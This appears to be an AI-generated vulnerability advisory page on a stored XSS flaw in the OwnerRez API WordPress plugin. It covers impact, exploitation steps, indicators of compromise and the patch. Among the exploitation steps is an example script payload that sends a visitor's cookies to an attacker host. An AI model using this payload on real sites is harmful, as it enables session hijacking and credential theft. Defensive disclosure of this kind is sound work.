CVE-2025-28957
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-28957 is a Stored Cross-Site Scripting (XSS) vulnerability in the OwnerRez API WordPress plugin affecting versions up to and including 1.2.1. The flaw was reported by researcher Muhammad Yudha - DJ on May 31, 2025, and publicly disclosed by Patchstack on July 4, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium), with a patched version (1.2.2) available (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An attacker with at least Contributor-level privileges can inject malicious scripts into fields processed by the OwnerRez API plugin; these scripts are then persistently stored and executed in the browsers of other users who visit the affected pages. Exploitation requires low attack complexity over a network vector, but does require user interaction (a privileged user must view the injected content) and results in a changed scope, meaning the impact can extend beyond the vulnerable component (Patchstack).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which execute in the context of any user's browser upon visiting the affected page. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims (including administrators), redirection to malicious sites, and defacement. The changed scope means impact can extend to users and systems beyond the directly vulnerable plugin component (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-28957. The EPSS score is approximately 0.033% (0.000330), indicating a very low probability of exploitation in the near term. The vulnerability requires at least Contributor-level access to the WordPress site to inject payloads, which limits opportunistic exploitation. Patchstack classifies this as low priority with no impactful threat currently observed (Patchstack).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least Contributor or higher privileges on a site running OwnerRez API plugin version ≤ 1.2.1.
  2. Identify Vulnerable Input Field: Locate the input field(s) within the OwnerRez API plugin interface that lack proper output encoding or sanitization.
  3. Inject Malicious Payload: Submit a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field via the plugin's content submission interface.
  4. Payload Stored: The malicious script is stored in the WordPress database without proper sanitization.
  5. Victim Triggers Execution: When an administrator or other user visits the page rendering the stored content, the injected script executes in their browser, potentially stealing session cookies, performing actions on their behalf, or redirecting them to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related endpoints from low-privileged user accounts containing HTML/JavaScript tags or encoded script payloads.
  • Database: Unexpected <script>, <img onerror=, or similar HTML/JS tags stored in WordPress database fields associated with the OwnerRez API plugin.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages rendered by the OwnerRez plugin (indicative of data exfiltration via XSS).
  • Browser/Application: Unexpected redirects, pop-ups, or unauthorized form submissions occurring when authenticated users visit pages containing OwnerRez plugin content.

Mitigation and workarounds

The vendor has released version 1.2.2 of the OwnerRez API WordPress plugin, which addresses this vulnerability. Site administrators should update the plugin to version 1.2.2 or later immediately. If an immediate update is not possible, restricting Contributor-level and above account registrations or disabling the plugin temporarily can reduce exposure. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).

Community reactions

Wordfence included CVE-2025-28957 in its weekly WordPress vulnerability report for the period of June 30 to July 6, 2025, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence). Patchstack, which coordinated the disclosure, classified the issue as low priority with no impactful threat currently observed (Patchstack). No significant broader media coverage or notable researcher commentary beyond these standard disclosure channels has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-92541HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-92540HIGH7.2
  • import-users-from-csv-with-meta
NoYesSep 20, 2026
CVE-2026-86785MEDIUM5.3
  • woo-to-facebook-shop
NoNoSep 20, 2026
CVE-2026-92965LOW3.7
  • tiktok-for-business
NoYesSep 20, 2026
CVE-2026-92423LOW2.7
  • meow-gallery
NoYesSep 20, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management